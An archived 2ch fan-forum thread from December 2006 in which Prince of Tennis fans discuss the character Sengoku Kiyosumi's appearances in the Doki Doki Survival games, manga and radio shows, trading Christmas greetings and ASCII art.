喜多と新渡米が居ないのはまあいつもの事……

ドキサバ海までまだ1ヶ月以上あるのか長いな

161 :名無しかわいいよ名無し:2006/12/23(土) 00:31:40 ID:wgnG+39c
地味ーズよりもグルグルほっぺと葉っぱ生えてる奴の方がよっぽど地味だと思う

162 :名無しかわいいよ名無し:2006/12/23(土) 15:00:00 ID:0eqIW5S1
キヨは稀に見るいいキャラなんだからもっと出して欲しいな・・・。
彼を好きになったのは「はっ、いかん。人の不幸を喜んじゃいかんぞ」
(うろ覚え)のシーン。
敵の学校って嫌味に演出されるから、キヨも最初はそういう子なのかと
思ってたらこんな不意打ちが。そんで惚れた。

ちなみに同じことをジロちゃんの覚醒時にも経験した。
それまで性格悪いのかと思ってた。

163 :名無しかわいいよ名無し:2006/12/23(土) 20:56:42 ID:Ao9xLf2S
ドキサバ山でキヨの目撃情報はないのかな…
結構いろいろ海キャラ出てるのに。
忍足ルートで会話に名前だけは出てきたけどさ(ノД`)

164 :名無しかわいいよ名無し:2006/12/23(土) 21:54:43 ID:ChTGwa/j
キヨ背景にはいたけど…。

女の子大好きなキヨがつぐみに話しかけてこないなんて意外だ。


165 :名無しかわいいよ名無し:2006/12/23(土) 22:25:44 ID:Ao9xLf2S
だよなあ。
海だろうが山だろうが気にせず一挙両得!しに来そうなのに。

166 :名無しかわいいよ名無し:2006/12/24(日) 01:27:32 ID:0pEJoZOm
(´;ω;`)

167 :名無しかわいいよ名無し:2006/12/24(日) 01:35:53 ID:8NrKvQpo
どうしたの?

168 :名無しかわいいよ名無し:2006/12/24(日) 02:22:18 ID:jQtUUVN+
>>164
キヨ背景化なのか。・゚・(ノД`)・゚・。
早く海発売されないかなーキヨの活躍を拝みたい

169 :名無しかわいいよ名無し:2006/12/24(日) 08:38:31 ID:tChFoFbE
キヨがつぐみと仲良く話してて彩夏が不安になるイベントはありますか?

170 :名無しかわいいよ名無し:2006/12/24(日) 09:34:18 ID:tF8IlCOG
>>169
あーありそう。でも彩夏プレイ時にそれは嫌かも…って思う自分キモスorz

171 :名無しかわいいよ名無し:2006/12/24(日) 20:28:45 ID:HPbeRvaZ
キヨを兄貴に、ジロちゃんを弟に、観月を家庭教師に欲しい。
豪華すぎる。

172 :名無しかわいいよ名無し:2006/12/24(日) 23:32:38 ID:LFRFx6px
ラジプリのバスタイムにキヨキタ━━━━(゚∀゚)━━━━!!
「シャワーが丁度いい温度で出た!こいつはラッキー↑」ってた(´Д`*)

173 :名無しかわいいよ名無し:2006/12/24(日) 23:38:18 ID:FEItQvyr
キヨの家のシャワー、温度設定できないんだwww

174 :名無しかわいいよ名無し:2006/12/24(日) 23:44:14 ID:LFRFx6px
>>173
ハッ(゚Д゚;)
キヨが出た事が嬉しくて気にも留めなかったけどそうかwww

175 :名無しかわいいよ名無し:2006/12/24(日) 23:55:43 ID:FEItQvyr
>>174
まだそういう家もあるだろうし、温度設定できなくても良いんだけどさw
一発でいい温度が出せるとラッキーだよね。キヨの気持ちわかるよww

176 :名無しかわいいよ名無し:2006/12/25(月) 00:33:50 ID:xOAm1WOo
>173
シャワー温度調節も追い炊きもできない我が家に
対する挑戦かー!ヽ(`Д´)ノ

177 :名無しかわいいよ名無し:2006/12/25(月) 00:48:09 ID:ujQsBrAZ
>>176
おお、悪気は無いの。許して〜。
あなたはリアルでキヨの気持ちが解るラッキーな人だ!

178 :名無しかわいいよ名無し:2006/12/25(月) 00:55:47 ID:xOAm1WOo
>177
そっかそう考えればラッキー↑!
すまんかったノ(´д`*)

179 :名無しかわいいよ名無し:2006/12/25(月) 01:11:07 ID:ujQsBrAZ
>>178
いえいえ、コチラコソ。ちょっと配慮の無い発言だったよ。
でも許してもらえた私もラッキー↑
キヨのファンはいい人がいっぱいだー!

180 :名無しかわいいよ名無し:2006/12/25(月) 02:33:33 ID:8r1ezNPX
Merry Christmas!

       ゞ
    (´・ω・`)<このスレの皆はいい子だからきっとサンタがくるよ!ラッキー↑
☆☆,, "U  U"ミ ☆☆
 ‥‥‥▲‥*‥‥
 ‥*‥▲▲‥‥‥
 ‥‥▲▲▲‥‥*
 *‥▲▲▲▲‥‥
 ‥‥‥■‥‥*‥

181 :名無しかわいいよ名無し:2006/12/25(月) 07:55:55 ID:SM37g5ii
メリークリ♪〜
みんなにもステキなラッキー↑が訪れるように!

キヨは何ケーキが好きなのかな〜
チーズケーキかな。

182 :名無しかわいいよ名無し:2006/12/25(月) 19:12:57 ID:BIyLB6ns
メリークリスマース!

>180-181
分と秒がそれぞれおそろい。ラッキーな予感!

183 :名無しかわいいよ名無し:2006/12/25(月) 23:26:49 ID:rIRvUDCQ
ギリギリメリークリスマス!!

>>182
本当だ凄い!キヨも来たしこのスレラッキー↑で溢れてるな

184 :名無しかわいいよ名無し:2006/12/25(月) 23:37:35 ID:xOAm1WOo
メリクリだった、仕事で忘れかけてたヤバス。

>124のサンタキヨさんが
ホットプレートとお好み焼きの材料一式持ってきて
目の前で焼いてくれるということに勝手にしました。

185 :名無しかわいいよ名無し:2006/12/26(火) 04:32:23 ID:9O2QovGB
跡部スレにも>>180みたいなAAがあったw

186 :名無しかわいいよ名無し:2006/12/26(火) 16:12:13 ID:nqbP8no4
大分落ちたのでageときます

海まであと1ヶ月か…早くここの住人達と共にキヨに萌え転がりたいよ

187 :名無しかわいいよ名無し:2006/12/26(火) 22:56:47 ID:FyrmyAQk
【テニスの王子様】地味'sを愛でるスレ【山吹】
http://comic6.2ch.net/test/read.cgi/cchara/1167140562/

188 :名無しかわいいよ名無し:2006/12/27(水) 01:01:12 ID:7nbtBiyO
|─⌒)
|(,,ェ)・)
|Д゚) < 中の人など…
⊂/     
| /
|


189 :名無しかわいいよ名無し:2006/12/27(水) 02:29:13 ID:gqLIAbRC
山に全然キヨでてこない…

オシタリとの会話に名前が出てきた
でも、名前だけ……orz
姿を表してくれてもいいじゃないか…


190 :名無しかわいいよ名無し:2006/12/27(水) 12:37:27 ID:rI7yETxq
バレ氏によると阿久津本誌再登場
でもキヨのキの字もない…キヨは一緒について来てはいないのかorz

191 :名無しかわいいよ名無し:2006/12/27(水) 13:03:11 ID:xqa4iYEG
いや、この後出てくると信じよう!

192 :名無しかわいいよ名無し:2006/12/27(水) 13:15:01 ID:rI7yETxq
そっそうだねキヨ再登場を信じるよ(`・ω・´)シャキーン
それにしても河村の試合は見に来て山吹の試合には顔も出さないとは阿久津ヒドス

193 :名無しかわいいよ名無し:2006/12/27(水) 15:58:06 ID:uXveVQ0Z
>>189
神尾ルートにも名前のみ…何だこの焦らしプレイorz
これからキヨと打ちに行くという神尾に「連れてってくれえええ!!」とすがりつきたくなりますた

194 :名無しかわいいよ名無し:2006/12/28(木) 00:03:00 ID:HRLpsfWH
中の人つながりなせいかずいぶんとまた仲良しさんだなw

ラジオでもキヨとキャミオ二人でラーメン食べに行ったミニドラマがあったって
どこかで読んだんだけどこの回ってCDに落ちてるのかな?

195 :名無しかわいいよ名無し:2006/12/28(木) 01:07:32 ID:SGn2+NDs
>>192
次回にキヨが出てきて、

キヨ「俺たちの試合も応援してくれてたんだよね」
亜久津「…(気付いてたのか)」
と言う展開を希望

キヨの「負けちまったよ…亜久津」のセリフも隠れて見に来てる亜久津へのメッセージだったらかっこいい


と思うんだけどなあ…

196 :名無しかわいいよ名無し:2006/12/28(木) 01:21:45 ID:wywT/CNZ
そんな展開でキヨ再登場だったらいいな
阿久津はド━(゚Д゚)━ ン !!!と大ゴマ再登場でウラヤマシス

>>194
そういえばそんなのあったと思って探して聞いたらキヨの「ご麺ねっ!」が凄いカワユスだったw

197 :名無しかわいいよ名無し:2006/12/28(木) 01:35:47 ID:OgpOCgcz
亜久津、アイラインが薄くなって男前度が上がってる希ガス…
キヨも、キヨも来てくれ〜〜〜〜!!

198 :名無しかわいいよ名無し:2006/12/28(木) 01:45:48 ID:US7nVY+E
>195
それは燃えかつ萌えな展開…パッション!!
武器面子そろってくれればさらに倍。

>196
キヨ文字のみ@ドキサバ山篇につづいてまたしても
新たな焦らしプレイを出してくるなんてっ…くやしいっ(ビクビクッ


何回目か詳細キボンヌー(;つД`)

199 :名無しかわいいよ名無し:2006/12/28(木) 11:52:12 ID:RMYOYkzm
これがもし河村と桃城のダブルスだったら亜久津のついでに千石も出したのかな…

200 :名無しかわいいよ名無し:2006/12/28(木) 15:04:32 ID:O67Y8r+l
>>199
つ・つ・つ・ついでと申したのはこの口かっ!!

201 :名無しかわいいよ名無し:2006/12/29(金) 01:37:25 ID:oGSoGKNp
いや作者の贔屓目から見ると亜久津>>>千石かなと思っただけです

202 :名無しかわいいよ名無し:2006/12/29(金) 04:13:57 ID:8l+pdksJ
久し振りにキヨがマンパの時の聞き直したがやはりこのコンビ(・∀・)イイ!!
またこの2人でマンパやらないかな。つかCDも早く出して欲しいのさ松P

203 :名無しかわいいよ名無し:2006/12/29(金) 10:14:02 ID:Tjb8ls2J
たしけあっくんの描写になると気合い入るからなあ・・・
でもキヨも忘れられているわけではないと思うヨ!!
・・・と書いてみるtest

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)